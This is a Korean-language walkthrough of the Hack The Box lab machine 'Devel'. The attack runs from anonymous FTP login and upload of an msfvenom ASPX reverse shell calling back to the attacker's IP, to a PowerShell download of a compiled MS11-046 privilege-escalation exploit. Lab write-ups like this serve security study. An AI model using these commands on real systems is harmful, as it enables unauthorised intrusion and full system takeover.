devel 롸업 정리

nmap

21번과 80번 포트만 있다.

21번 포트에서 ftp anonymous 로그인이 가능하다고 한다. 접속해봐야겠다.

---

ftp

ftp 10.10.10.5

name> anonymous

passwd> [Enter]

dir 결과에서 나온 htm에 접속한다. 

FTP 서버는 HTTP 서버와 같은 root에 있는 것으로 파악된다. (사실 이건 무슨 말인지 잘 모르겠다. 하지만 이게 왜 중요한 사실인지 뒤에서 설명했다.)

만약 우리가 ftp 서버에 reverse shell을 업로드하면, 웹 서버를 통해 실행할 수 있을 것이다.

 

[**] 로컬에 html 파일 하나 만들어서 ftp에 올리기

echo "<html><body>hello</body></html>" > test.html

ftp 접속

put test.html

ls ☞ test.html이 잘 업로드된 걸 확인

브라우저로 10.10.10.5/test.html 접속, 확인

 

이것으로 우리가 ftp 서버에 파일을 업로드하고 브라우저에서 열면 웹 서버에 의해 실행된다는 것을 파악했다.

nmap 결과로 파악된 웹 서버의 버전은 microsoft IIS 7.5이다.

IIS 웹 서버는 일반적으로 asp나 aspx(asp.net) 중 하나로 실행된다.

7.5 버전 이후로 aspx를 지원한다고 한다.

---

reverse shell 생성하기

msfvenom --list formats

즉, aspx 확장자로 리버스쉘을 생성할 수 있다.

 

msfvenom -p windows/shell_reverse_tcp -f aspx LHOST=10.10.14.2 LPORT=1234 -o shell.aspx

ftp 다시 접속해서 put shell.apsx 후 브라우저로 접속하면 쉘이 따진다.

---

권한 상승

> systeminfo

무려 windows 7 enterprise 6.1.7600/ x86-based PC/ owner babis

 

windows 7 7600 exploit 구글링ㄱㄱ

https://www.exploit-db.com/exploits/40564

Microsoft Windows (x86) - 'afd.sys' Local Privilege Escalation (MS11-046)

이를 바탕으로 searchsploit ㄱㄱ

둘 중 위에 것이 맞아보인다.

 

사용법 찾아내기(이런 긴 익스코드에서는 사용법 찾아내는게 우선일듯 하다)

apt-get update

apt-get install mingw-w64

i686-w64-mingw32-gcc 40564.c -o 40564.exe -lws2_32

python -m SimpleHTTPServer 5555

------------------------------------------------------------------

[**] 리눅스에서는 wget으로 파일을 받았는데, 윈도우에서는 좀 다르다.

nc 혹은 powershell을 사용해야 한다.

존재하는지 파악하기 위해서는 nc, powershell을 그대로 입력해본다. powershell만 존재한다는 것을 알 수 있다.

-------------------------------------------------------------------

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.2:5555/40564.exe', 'c:\Users\Public\Downloads\40564.exe')"

 

 

user.txt, root.txt 모두 확인할 수 있다.